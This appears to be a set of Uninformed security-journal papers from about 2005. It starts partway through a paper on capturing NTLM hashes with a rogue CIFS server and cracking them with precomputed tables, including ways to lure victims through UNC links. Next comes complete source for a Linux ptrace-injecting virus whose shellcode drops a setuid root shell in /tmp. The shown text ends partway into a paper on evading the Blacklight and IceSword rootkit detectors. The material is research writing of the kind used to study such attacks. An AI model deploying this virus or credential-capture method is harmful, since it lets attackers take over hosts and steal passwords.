hash is based on 0x??AAD3B435B514. The only part unknown is the first
byte, as this one is based on the first LM hash. One byte, thats 256
permutations. By brute forcing those up to 256 possibilities as the
value of the first byte, and using the resulting key to encrypt the
known challenge once again, one should eventually stumble over a result
that's the same as the second 8 bytes of the NTLM hash. Now one can rest
assured, that the password really is smaller than 8 bytes. Even if the
password is bigger than 7 bytes, and the second LM hash does not end
with 0x04EE thus, creating all possible 2 byte combinations, padding
them with 5 null bytes and hashing those with the challenge until the
final 8 byte chunk of the NTLM hash matches will easily reveal the final
2 byte of the LM hash, with no more than up to 64k permutations.
2.3) The NTLM challenge
The biggest difference between the way the LM and the NTLM hashing
mechanisms work is the challenge. In NTLM the challenge acts like a
salt does in other cryptographic implementations. This throws a major wrench
in our pre-computing table designs, adding 2^64 permutations to the
equation.
3.0) Breaking NTLM with precomputed tables
3.1) Attacking the first part
Precomputing tables for NTLM has just been declared pretty much
impossible with today's computing resources. The problem is pre-computing
every possible hash value (and then, of course, storing those values even
if computation was possible). By applying a trick to remove the
challenge from the equation however, precomputing NTLM hashes becomes
almost as easy as the creation of LM tables. By writing a rogue CIFS
server that hands out the same static challenge to every client that
tries to connect to it, the problem has static values all over the place
once again, and hashtable precomputation becomes possible.
The following screenshot depicts a proof of concept implementation that
accepts an incoming CIFS connection, goes through the protocol
negotiation phase with the connecting client, sends out the static
challenge, and disconnects the client after receiving username and NTLM
hash from it. The server also logs some more information that the client
conveniently sends along.
IceDragon wincatch bin/wincatch
This is Alpha stage code from nologin.org
Distribution in any form is denied
Src Name: BARRIERICE
IP: 192.168.7.13
Username: Testuser
Primary Domain: BARRIERICE
Native OS: Windows 2002 Service Pack 2 2600
Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666
That's a Windows XP machine connecting to the rogue server running
on Linux. The client is connecting from IP address 192.168.7.13. The
username is ``Testuser'', the name of the host is ``BarrierIce'',
and the password hash got captured too of course.
3.2) Table creation
The creation of rainbow tables to precompute the hashes is a good
approach to easily breaking the hashes now, but as harddisks grow bigger
and bigger while costing ever less, I decided to roll my own table
layout instead. As the reader will see, my approach requires way more
harddisk space than rainbow tables do, but the tables are
computationally less expensive to create and contain a determined set
of data, unlike rainbow tables with their less-than-100% probability
of containing a certain password.
In order to create those tables, the big question is how to efficiently
store all the data. In order to stay within certain bounds, I decided to
stick to alphanumeric tables only. Alphanumeric, that's 26 chars from
a-z, 26 chars from A-Z, and an additional 10 for 0-9. That's 62 possible
values for each character, so that's 62^7 permutations, right? Wrong.
NTLM hashes use the LM hash as input. The LM hashing algorithm
upper-cases its input. Therefore the possible keyspace shrinks to 36
characters, and the number of possible permutations goes down to 36^7.
The only other input that needs accounting is the NULL padding bytes
used, bringing the total permutations to a bit more than 36^7.
The approach taken here to allow for easy storage and recovery of hashes
and plain text is essentially to place every possible plaintext password
into one of 2048 buckets. It could easily be expanded to more. The table
creation tool simply generates every valid alphanumeric password, hashes
it and checks the first 11 bits of the hash. These bits determine which
of the 2048 buckets (implemented as files in this case) the plaintext
password belongs to. The plaintext password is then added to the bucket.
Now whenever a hash is captured, looking at the first 11 bits of the
hash determines the correct bucket to look into for the password. All
that's left to do now is hashing all the passwords in the bucket until a
match is found. This will take on average ((36^7)/2048)/2, or
19131876 hash operations. This takes approximately three minutes on my
Pentium 4 2.8 Ghz machine. It takes the NTLM table generation tool 94
hours to run on my machine. Fortunately, I only had to do that once :)
The question is how to store more than 36^7 plaintext passwords, ranging
in size from 0 (empty password) to 7 bytes.
Approach 1: Store each password separated by newlines. As most passwords
are 7 byte in size and an additional newline extends that to 8 byte, the
outcome would be somewhere around (36^7)*8 bytes. That's roughly 584
gigabytes, for the alphanumeric keyspace. There has to be a better way.
Approach 2: By storing each password with 7 bytes, be it shorter than 7
or not, the average space required for each password goes down from 8 to
7, as it's possible to get rid of the newlines. There's no need to
separate passwords by newlines if they're all the same size. (36^7)*7 is
still way too much though.
Approach 3: The plaintext passwords are generated by 7 nested loops. The
first character changes all the time. The second character changes every
time the first has exhausted the entire keyspace. The third increments
each time the second has exhausted the keyspace and so on. What's
interesting is that the final 3 bytes rarely change. By storing them
only when they change, it's possible to store only the first 4 bytes of
each password, and once in a while a marker that signals a change in the
final 3 bytes, and is followed by the 3 byte that now form the end of
each plaintext password up to the next marker. That's roughly (36^7)*4
bytes = 292 gigabytes. Much better. Still too much.
Approach 4: For each character, there are 37 possible values: A-Z, 0-9
and the null byte. 37 different values can be expressed in 6 bits. So we
can stuff 4 characters into 4*6 = 24 bits, which is 3 bytes. How convenient!
(37^7)*3 == 265 gigabytes. Still too much.
Approach 5: The passwords are being generated and stored in a
consecutive way. The hash determines which bucket to place each new
plaintext password into, but it's always 'bigger' than the previous one.
Using 2048 buckets, a test showed that, within any one file, no offset
between a password being stored and the next one stored into this bucket
exceeded 55000. By storing offsets to the previous password instead of
the full word, each password can be stored as a 2 byte value.
For example, say the first password stored into one bucket is the one
char word "A". That's index 10 in the list of possible characters, as it
starts with 0-9. The table creation tool would now save 10 into the
bucket, as it's the first index from the start of the new bucket, and
it's 10 bigger than zero, the start value for each bucket. Now if by
chance the one character password "C" was to be stored into the same
bucket next, the number 2 would be stored, as "C" has an offset of 2 to
the previous password. If the next password for this bucket was "JH6",
the offset might be 31337.
Basically each password is being stored in a base36 system, so the first
2 byte password, being "00", has an index of 37, and all the previous
password offsets and the offset for "00" itself of the bucket that "00"
is being stored in add up to 37. To retrieve a password saved in this
way requires a transformation of the decimal index back into the base36
system, and using the resulting individual numbers as indexes into the
char keyspace[].
The resulting table size is (36^7)*2 == 146 gigabytes. Still pretty
big, but small enough to easily fit on today's harddisks. As I mentioned
earlier the actual resulting size is a bit bigger in fact, as a bunch of
passwords that end with null bytes have to be stored too. In the end
it's not 146 gigabytes, but 151 instead.
3.3) The big problem
Now there's a big problem concerning the creation of the NTLM lookup
tables. The first 8 byte of the final hash are derived from the first 7
byte of the LM hash, which are derived from the first 7 byte of the
plaintext password. Creating tables to match the first 8 byte of the
NTLM hash to the first 7 bytes of the password is thus possible, but the
same tables do not work for the second or even third block of the 24
byte NTLM hash.
The second 8 byte chunk of the hash is derived from the last byte of the
first LM hash, and the first 6 byte of the second LM hash. This first
byte adds 256 possible values to the second LM hash. While the first 8
byte chunk of the 24 byte NTLM hash stems purely from a LM hash of a
plaintext password, the second 8 byte chunk stems from an undetermined
byte and an additional 6 bytes of a LM hash.
Being able to look up the first up to 7 bytes of the password is a big
advantage already though. The second part of the password, if it's
longer than 7 bytes at all, can now usually be easily guessed or brute
forced. Having determined that the password starts with "ILLUSTR" for
example, most often it may end with "ATION" or "ATOR". On the other
hand, when applying the brute force approach to this example after
looking up the first 7 bytes, it'd require to brute force 4-5 characters
until the final password is revealed. Even off-the-shelf hardware does
this in seconds. While taking a bit longer, even brute forcing 6 bytes
is nothing one couldn't sit out. 7 bytes, however, requires an
inconvenient amount of time. That's where being able to look that part
up as well would really come in handy. Well, guess what. There is a way.
3.4) Breaking the second part of the password
As described earlier in this paper, the second part of the password,
just as the first one, is used to encrypt a known string to form an 8
byte LM hash. Knowing the challenge sent from the server to the client,
it is possible to deduce the final 2 bytes of that LM hash out of the
third chunk of the NTLM hash. Doing so was explained in section 2.2.
So the final 2 byte of the LM hash of the second half of the original
password are known. If a similar approach to breaking the first half of
the password is being applied now, looking up the second part of the
password as well becomes quite possible.
The key here is to create a set of precomputed LanMan tables that are
sorted by the final 2 bytes of the LM hash. So once the final 2 byte of
the LM hash are known, a file is thus identified that contains plaintext
passwords that when hashed result in a matching 2 byte sequence at the
end.
The second chunk of the NTLM hash is derived from 6 bytes that are the
start of the hash of one of the plaintext passwords out of the file that
just got identified, and a single byte, the first one, which is the
final byte of the first LM hash.
Considering the first part of the password broken, that byte is known.
So all that's left to do is hash all the possible passwords in the file,
fit the single known byte into the first position of a string and
concatenate this one with 6 bytes from the just created hash, hashing
those 7 bytes again and comparing the result to the second chunk of the
NTLM hash. If it matches, the second part of the password has been
broken too.
Even if looking up the first part of the password didn't prove
successful, the method may still be applied. The only change would be
that up to 256 possible values for the first byte would have to be
computed and tested as well.
What's really interesting to note here is that the second set of
tables, the sorted LM tables, unlike the first set of NTLM tables, does
NOT depend on a certain challenge. It will work with just any challenge,
which is usually sniffed or acquired from the wire when the password hash
and the username are being taken.
4) How to get the victim to log into the rogue server?
The big question to answer is how one can get the victim to log into the
rogue server, thus exposing his username and password hash for the
attacker to break.
Approach 1: Sending an HTML mail that includes a link in the form of a
UNC path should do the trick, depending primarily on the sender's
rhetorical ability in getting the victim to click the link, and on the
mail client understanding what it's expected to do. A UNC path is
usually of the form \\192.168.7.6\share, where the IP address obviously
specifies the host to connect to, and ``share'' is a shared resource on
that host.
Due to Microsoft always being concerned about comfort first, the
following will happen once the victim clicks the link on a Windows
machine. The OS will try to log into the specified resource. When asked
for a username and password, the client happily provides the current
user's username and his hashed password to the server in an effort to
try to log in with these credentials. No user interaction required. No
joke.
Approach 2: Getting the victim to visit a site that includes a UNC path
with Internet Explorer has the same result. An image tag whose source
references such a UNC path will do the trick. IE will make Windows try
to log into the resource in order to get the image. Again, no user
interaction is required. This trick does not work with Mozilla Firefox,
by the way.
Approach 3: If the rogue server is part of the LAN, advertising it in
the network neighbourhood as "warez, porn, mp3, movie" - server should
result in users trying to log into it sooner or later. There's no way
anyone can withstand the power of the 4 elements!
There's plenty of other ways that the author leaves to the reader's
imagination.
5) Things to remember
Once a hash has been received and successfully broken, it may still not
be the correct password, and accordingly not allow the attacker to log
into his victim's machine. That's due to the password being hashed all
uppercase for LM, while the MD4 based second hash actually is case
sensitive. So a hash that's been deciphered as being "WELCOME" may
originally have been "Welcome" or "welcome" or even "wELCOME" or
"WeLcOme" or .. well, you get the idea. Then again, how many users
actually apply uncommon spelling schemes?
6) Covering it up
Having read this paper the reader should by now realize that NTLM,
an authentication mechanism that probably most computers on this
planet support, is actually a big threat to hosts and entire
networks. Especially with the recently discovered remote Windows
exploits that require valid accounts on the victim machines for the
attacker to log into first, a worm that makes people visit a
website, which in turn makes them log into a rogue server that
breaks the hash and automatically exploits the victim is a
frightening threat scenario.
Bibliography
Windows NT rantings from the L0pht
http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt
Making a Faster Cryptanalytic Time-Memory Trade-Off
http://lasecwww.epfl.ch/~oechslin/publications/crypto03.pdf
uninformed/3.5.txt
Linux Improvised Userland Scheduler Virus
Izik
izik@tty64.org
Last modified: 12/29/2005
1) Introduction
This paper discusses the combination of a userland scheduler and
runtime process infection for a virus. These two concepts complement
each other. Runtime process infection opens the door to invading
other processes, and the userland scheduler provides a way to
make the injected code coexist with the original process code. This
allows the virus to remain stealthy and active inside an infected
process.
2) Scheduler, Who?
A scheduler, in particular a process scheduler, is a kernel component
that selects which process to run next. The scheduler is the basis
of a multitasking operating system such as Linux. By deciding which
process may run, the scheduler is responsible for utilizing the
system in the best way and giving the impression that multiple
processes are executing simultaneously. A good example of using the
scheduler in a virus is when the fork() syscall is used to
spawn a child process for the virus to run in. But fork()
creates a separate child process, which thus appears in the system
process list and could attract attention.
3) Userland Scheduler
A userland scheduler, as opposed to the kernel scheduler, runs
inside an application's scope and deals with the application's threads
and processes. The userland scheduler is still subject to the kernel
scheduler and is meant to improve the application's multi-thread
management. One of the major tasks the scheduler performs is
context switching: taking airtime from one thread and giving it to
another. Improvising a userland scheduler inside an infected process
gives the option of switching from the original process to the virus
and back, without attracting too much attention on the way.
4) Improvising a Userland Scheduler
An application that implements a userland scheduler provides the
functions and support to do so in its code. This is a luxury that a
virus does not have, so improvising takes place. This raises two major
problems: how and when. How to perform the context switching task
within code that has no previous support for it, and when the userland
scheduler code can run to begin supervising in the first place.
There are a few ways to do it. For example, putting a hook on a
function is one way. Once the program calls the function that
has been hooked, the virus activates and afterwards returns control
to the program. But it's not an ideal solution, as there is no
guarantee that the program will keep calling it, or how often
or for how long. In order to get a wider scope that could cover the
entire program, signals can be used.
Looking at the signal mechanism in Linux, it's similar to the
interrupt mechanism, in that the kernel allows a program to process
a signal at any place in the program code without any special
preparation and to resume the program flow once the signal handler
function is done. It gives a very good way to perform context
switching with little effort. This answers the "how" question of how
to perform the context switching task: by using the signal handler
function as the base function of the virus, which will be invoked
whenever the SIGALRM signal is processed.
Adapting the signal model to our needs is supported by the
alarm() syscall. The alarm() syscall allows the
process to schedule the alarm signal (SIGALRM) to be
delivered, thus making it the kernel's responsibility. Having the
kernel constantly deliver a signal to the process hosting the virus
saves the virus the effort of doing it itself. This answers the
"when" question of when the userland scheduler code runs: the
alarm() syscall schedules a SIGALRM to be delivered to the process,
which in turn calls the virus function.
This code demonstrates the functionality of alarm() and
SIGALRM:
/*
* sigalrm-poc.c, SIGALRM Proof of Concept
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// SIGALRM Handler
void shapebreaker(int ignored) {
// Break the cycle
printf("\nX\n");
// Schedule another one
alarm(5);
return ;
}
int main(int argc, char **argv) {
int shape_selector = 0;
char shape;
// Register for SIGALRM
if (signal(SIGALRM, shapebreaker) == SIG_ERR) {
perror("signal");
return -1;
}
// Schedule SIGALRM for 5 secs
alarm(5);
while(1) {
// Shape selector
switch (shape_selector % 3) {
case 0:
shape = '.';
break;
case 1:
shape = 'o';
break;
case 2:
shape = 'O';
break;
}
// Print given shape
printf("%c\r", shape);
// Increase shape index
shape_selector++;
}
// NEVER REACHED
return 1;
}
The program concept is pretty simple: it prints a char in a loop,
selecting the char via an index variable. Every five seconds
a SIGALRM is scheduled for delivery using the
alarm() syscall. Once the signal has been processed, the
signal handler, which is the shapebreaker() function in
this case, is called and breaks the char sequence.
Afterwards the program continues as if nothing happened. From within
the signal handler function a virus can operate, and once it
returns, the program will continue flawlessly.
5) Runtime Process Infection
Runtime infection is done using the notorious ptrace()
syscall, which allows a process to attach to another process,
assuming of course that it has root privileges or a
parent-child relationship with the target, with some exceptions.
Once the attached process enters debugging mode, it is possible to
modify its registers and to read from and write to its address space.
These are the features required to slip in the virus code and
activate it. For an in-depth review of the ptrace() injection
method, refer to the "Building ptrace Injecting Shellcodes" article
in Phrack 59[1].
5.1) The Algorithm
Having the motives, tools and knowledge, here's the plan:
Infector:
---------
* Attach to process
> Wait for process to stop
> Query process registers
> Calculate previous stack page beginning
> Store current EIP
> Inject pre-virus and virus code
> Set EIP to pre-virus code
> Deattach from process
Pre-Virus:
----------
* Register SIGALRM signal
> Schedule SIGALRM (14secs)
> Give control back to process
Virus:
------
* SIGALRM handler invoked
> Check for /tmp/fluffy
> Create fluffy.c
> Compile fluffy.c
> Remove /tmp/fluffy.c
> Chmod /tmp/fluffy
> Jmp to pre-virus code
The infecting process is divided into two steps. The infector
injects the virus and the pre-virus code into the infected process,
and afterward sets the process EIP to point to the pre-virus
code. The pre-virus code independently registers for the SIGALRM
signal within the infected process and calculates the virus location
for the signal callback function. Then it schedules a SIGALRM
signal and passes control back to the process. Once the signal is
caught, the virus kicks in as the signal handler.
5.2) Meet Fluffy
The code that implements the above theory:
/*
* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <linux/user.h>
#include <linux/ptrace.h>
char virus_shcode[] =
// <_start>:
"\x90" // nop
"\x90" // nop
"\x60" // pusha
"\x9c" // pushf
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\xb0\x30" // mov $0x30,%al
"\xb3\x0e" // mov $0xe,%bl
"\xeb\x06" // jmp <_geteip>
// <_calc_eip>:
"\x59" // pop %ecx
"\x83\xc1\x0d" // add $0xd,%ecx
"\xeb\x05" // jmp <_continue>
// <_geteip>:
"\xe8\xf5\xff\xff\xff" // call <_calc_eip>
// <_continue>:
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x04" // jne <_resumeflow>
"\xb0\x1b" // mov $0x1b,%al
"\xcd\x80" // int $0x80
// <_resumeflow>:
"\x9d" // popf
"\x61" // popa
"\xc3" // ret
// <_virus>:
"\x55" // push %ebp
"\x89\xe5" // mov %esp,%ebp
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\xeb\x57" // jmp <_data_jmp>
// <_chkforfluffy>:
"\x5e" // pop %esi
// <_fixnulls>:
"\x3a\x46\x07" // cmp 0x7(%esi),%al
"\x74\x0b" // je <_access>
"\xfe\x46\x07" // incb 0x7(%esi)
"\xfe\x46\x0a" // incb 0xa(%esi)
"\xb0\xb3" // mov $0xb3,%al
"\xfe\x04\x06" // incb (%esi,%eax,1)
// <_access>:
"\xb0\xa8" // mov $0xa8,%al
"\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx
"\xb0\x21" // mov $0x21,%al
"\xb1\x04" // mov $0x4,%cl
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x74\x31" // je <_schedule>
// <_fork>:
"\x01\xc8" // add %ecx,%eax
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1f" // jne <_waitpid>
// <_exec>:
"\x31\xd2" // xor %edx,%edx
"\xb0\x17" // mov $0x17,%al
"\x31\xdb" // xor %ebx,%ebx
"\xcd\x80" // int $0x80
"\xb0\x0b" // mov $0xb,%al
"\x89\xf3" // mov %esi,%ebx
"\x52" // push %edx
"\x8d\x7e\x0b" // lea 0xb(%esi),%edi
"\x57" // push %edi
"\x8d\x7e\x08" // lea 0x8(%esi),%edi
"\x57" // push %edi
"\x56" // push %esi
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80" // int $0x80
// <_waitpid>:
"\x89\xc3" // mov %eax,%ebx
"\x31\xc0" // xor %eax,%eax
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x07" // mov $0x7,%al
"\xcd\x80" // int $0x80
// <_schedule>:
"\xc9" // leave
"\xe9\x7c\xff\xff\xff" // jmp <_start>
// <_data_jmp>:
"\xe8\xa4\xff\xff\xff" // call <_chkforfluffy>
//
// /bin/sh\xff-c\xff
// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ;
// cc -o /tmp/fluffy /tmp/fluffy.c ;
// rm -rf /tmp/fluffy.c ;
// chmod 4755 /tmp/fluffy\xff
//
// <_data_sct>:
"\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20"
"\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65"
"\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79"
"\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
"\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d"
"\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e"
"\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
"\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66"
"\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d"
"\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d"
"\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75"
"\x66\x66\x79\xff";
int ptrace_inject(pid_t, long, void *, int);
int main(int argc, char **argv) {
pid_t pid;
struct user_regs_struct regs;
long infproc_addr;
if (argc < 2) {
printf("usage: %s <pid>\n", argv[0]);
return -1;
}
pid = atoi(argv[1]);
// Attach to the process
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) {
perror(argv[1]);
return -1;
}
// Wait for a process to stop
if (waitpid(pid, NULL, 0) < 0) {
perror(argv[1]);
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
// Query process registers
if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) < 0) {
perror("Oopsie");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
printf("Original ESP: 0x%.8lx\n", regs.esp);
printf("Original EIP: 0x%.8lx\n", regs.eip);
// Push original EIP on stack for virus to RET
regs.esp -= 4;
ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip);
// Calculate the previous stack page top address
infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000;
printf("Injection Base: 0x%.8lx\n", infproc_addr);
// Inject virus code
if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) {
return -1;
}
// Change EIP to point over virus shcode
regs.eip = infproc_addr + 2;
printf("Current EIP: 0x%.8lx\n", regs.eip);
// Set process registers (EIP changed)
if (ptrace(PTRACE_SETREGS, pid, NULL, &regs) < 0) {
perror("Oopsie");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
// It's fluffy time!
if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) {
perror("Oopsie");
return -1;
}
printf("pid #%d got infected!\n", pid);
return 1;
}
// Injection Function
int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) {
long data;
while (buflen > 0) {
memcpy(&data, buf, 4);
if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) {
perror("Oopsie!");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
memaddr += 4;
buf += 4;
buflen -= 4;
}
return 1;
}
A few pointers about the code:
The virus assembly parts were written as one chunk: the pre-virus
code sits at the top and the virus code at the bottom. It is also
written in shellcode programming style, which produces NULL-free and
somewhat optimized code. Since this chunk is injected into the
infected process, it is kept as small as possible, which is always a
good idea.
The virus code assumes it will run more than once inside a given
infected process. This means that self-modifying actions, such as
fixing NULLs at runtime, first check whether they are still needed in
the current virus iteration.
The virus itself is programmed to drop a suid shell called
/tmp/fluffy. Before doing so, it checks whether the file already
exists; if not, it execve()s a small hardcoded shell command line to
generate a suid wrapper. An iteration occurs every 14 seconds.
The signal() syscall has a habit of resetting the signal handler to
the default after it has been invoked, which means the virus has to
re-register its handler every time. An alternative solution is to set
up the handler using other signal-related syscalls such as
sigaction() or rt_sigaction(), which is how the libc signal() function
is implemented. Choosing signal() over these syscalls came down to
size considerations.
5.3) Further Design Issues
Aside from the code itself:
Injecting at the top of the previous stack page is a safety measure to
ensure the virus code won't overwrite any program-related data on the
stack. Testing the virus on the syslogd daemon showed that this makes
sense, as syslogd at some point managed to partly overwrite the virus
code. A common pitfall is NULLs: an overwrite with two NULL bytes
(e.g. \x00\x00) decodes to the valid instruction add %al,(%eax), which
easily leads to a crash.
Apart from the stack, it is possible to inject the code into the .text
section itself. On x86/IA-32, pages are 4k-aligned and the program
code might not fill up its last page entirely. The resulting gap is
often referred to as a "cave", and it is an ideal place to park the
virus, assuming of course the virus is small enough to fit into it.
But due to the nature of the .text section, which is not writable, the
virus will need to call mprotect() on the current page before
performing self-modifying actions on itself.
An easy way to find a suitable process to infect using an automatic
approach would be to start an attachment loop from PID zero onward. As
the system boots and enters runlevel 3 (i.e. multiuser), a series of
daemons is launched. Due to the timing of these daemons, their PIDs
will be close to zero; examples are crond, syslogd and inetd.
6) Conclusion
Implementing a userland scheduler allows external code to run in
perfect harmony with the existing code. Taking an exploit scenario of
any kind and adding this feature to it can turn a plain, straightforward
shellcode into a backdoor and more.
References:
[1] Building ptrace Injecting Shellcodes
anonymous
http://www.phrack.org/show.php?p=59&a=12;
accessed December 29, 2005.
uninformed/3.6.txt Normal file
FUTo
Peter Silberman & C.H.A.O.S.
1) Foreword
Abstract:
Since the introduction of FU, the rootkit world has moved away from
implementing system hooks to hide their presence. Because of this change
in offense, a new defense had to be developed. The new algorithms used
by rootkit detectors, such as BlackLight, attempt to find what the
rootkit is hiding instead of simply detecting the presence of the
rootkit's hooks. This paper will discuss an algorithm that is used by
both Blacklight and IceSword to detect hidden processes. This paper will
also document current weaknesses in the rootkit detection field and
introduce a more complete stealth technique implemented as a prototype
in FUTo.
Thanks:
Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for
doing great research, and all the nologin/research'ers who encourage
mind growth.
C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on
Christmas day), lonerancher, Pedram, valerino, and HBG Unit.
2) Introduction
In the past year or two, there have been several major developments in
the rootkit world. Recent milestones include the introduction of the FU
rootkit, which uses Direct Kernel Object Manipulation (DKOM); the
introduction of VICE, one of the first rootkit detection programs; the
birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the
first mainstream Windows rootkit detection tools; and most recently the
introduction of Shadow Walker, a rootkit that hooks the memory manager
to hide in plain sight.
Enter Blacklight and IceSword. The authors chose to investigate the
algorithms used by both Blacklight and IceSword because they are
considered by many in the field to be the best detection tools.
Blacklight, developed by the Finnish security company F-Secure, is
primarily concerned with detecting hidden processes. It does not attempt
to detect system hooks; it is only concerned with hidden processes.
IceSword uses a very similar method to Blacklight. IceSword
differentiates itself from Blacklight in that it is a more robust tool
allowing the user to see what system calls are hooked, what drivers are
hidden, and what TCP/UDP ports are open that programs, such as netstat,
do not.
3) Blacklight
This paper will focus primarily on Blacklight, since its algorithm was
the research focus for this paper. It also became apparent after
researching Blacklight that IceSword uses a very similar algorithm;
therefore, a weakness found in Blacklight would most likely exist in
IceSword as well.
Blacklight takes a userland approach to detecting processes. Although
simplistic, its algorithm is amazingly effective. Blacklight uses some
very strong anti-debugging features that begin by creating a Thread
Local Storage (TLS) callback table. Blacklight's TLS callback attempts
to befuddle debuggers by forking the main process before the process
object is fully created. This can occur because the TLS callback routine
is called before the process is completely initialized. Blacklight also
has anti-debugging measures that detect the presence of debuggers
attaching to it. Rather than attempting to beat the anti-debugging
measures by circumventing the TLS callback and making other program
modifications, the authors decided to just disable the TLS routine. To
do this, the authors used a tool called LordPE. LordPE allows users to
edit PE files. The authors used this tool to zero out the TLS callback
table. This disabled the forking routine and gave the authors the
ability to use an API monitor. It should be noted that disabling the
callback routine would allow you to attach a debugger, but when the
user clicked "scan" in the Blacklight GUI, Blacklight would detect the
debugger and exit. Instead of working up a second measure to
circumvent the anti-debugging routines, the authors decided to analyze
the calls occurring within Blacklight. To this end, they used
Rohitab's API Monitor.
In testing, one can see failed calls to the API OpenProcess (tls zero is
Blacklight without a TLS table). Blacklight tries opening a process with
process id (PID) of 0x1CC, 0x1D0, 0x1D4, 0x1D8 and so on. The authors
dubbed the method Blacklight uses as PID Bruteforce (PIDB). Blacklight
loops through all possible PIDS calling OpenProcess on the PIDs in the
range of 0x0 to 0x4E1C. Blacklight keeps a list of all processes it is
able to open, using the PIDB method. Blacklight then calls
CreateToolhelp32Snapshot, which gives Blacklight a second list of
processes. Blacklight then compares the two lists, to see if there are
any processes in the PIDB list that are not in the list returned by the
CreateToolhelp32Snapshot function. If there is any discrepancy, these
processes are considered hidden and reported to the user.
3.1) Windows OpenProcess
In Windows, the OpenProcess function is a wrapper to the NtOpenProcess
routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The
function prototype for NtOpenProcess is:
NTSTATUS NtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
The ClientId parameter is the actual PID that is passed by OpenProcess.
This parameter is optional, but during our observation the OpenProcess
function always specified a ClientId when calling NtOpenProcess.
NtOpenProcess performs three primary functions:
1. It verifies the process exists by calling PsLookupProcessByProcessId.
2. It attempts to open a handle to the process by calling
ObOpenObjectByPointer.
3. If it was successful opening a handle to the process, it passes the
handle back to the caller.
PsLookupProcessByProcessId was the next obvious place for research. One
of the outstanding questions was how PsLookupProcessByProcessId knows
that a given PID belongs to a valid process. The answer becomes clear
in the first few lines of the disassembly:
PsLookupProcessByProcessId:
mov edi, edi
push ebp
mov ebp, esp
push ebx
push esi
mov eax, large fs:124h
push [ebp+arg_4]
mov esi, eax
dec dword ptr [esi+0D4h]
push PspCidTable
call ExMapHandleToPointer
From the above disassembly, it is clear that ExMapHandleToPointer
queries the PspCidTable for the process ID.
Now we have a complete picture of how Blacklight detects hidden processes:
1. Blacklight starts looping through the range of valid process IDs,
0x0 through 0x4E1C.
2. Blacklight calls OpenProcess on every possible PID.
3. OpenProcess calls NtOpenProcess.
4. NtOpenProcess calls PsLookupProcessByProcessId to verify the
process exists.
5. PsLookupProcessByProcessId uses the PspCidTable to verify the
processes exists.
6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the
process.
7. If OpenProcess was successful, Blacklight stores the information
about the process and continues to loop.
8. Once the process list has been created by exhausting all possible
PIDs, Blacklight compares the PIDB list with the list it creates by
calling CreateToolhelp32Snapshot, a Win32 API that takes a snapshot of
all running processes on the system. A discrepancy between the two
lists implies that there is a hidden process; this case is reported by
Blacklight.
3.2) The PspCidTable
The PspCidTable is a "handle table for process and thread client IDs".
Every process' PID corresponds to its location in the PspCidTable. The
PspCidTable is a pointer to a HANDLE_TABLE structure.
typedef struct _HANDLE_TABLE {
PVOID p_hTable;
PEPROCESS QuotaProcess;
PVOID UniqueProcessId;
EX_PUSH_LOCK HandleTableLock [4];
LIST_ENTRY HandleTableList;
EX_PUSH_LOCK HandleContentionEvent;
PHANDLE_TRACE_DEBUG_INFO DebugInfo;
DWORD ExtraInfoPages;
DWORD FirstFree;
DWORD LastFree;
DWORD NextHandleNeedingPool;
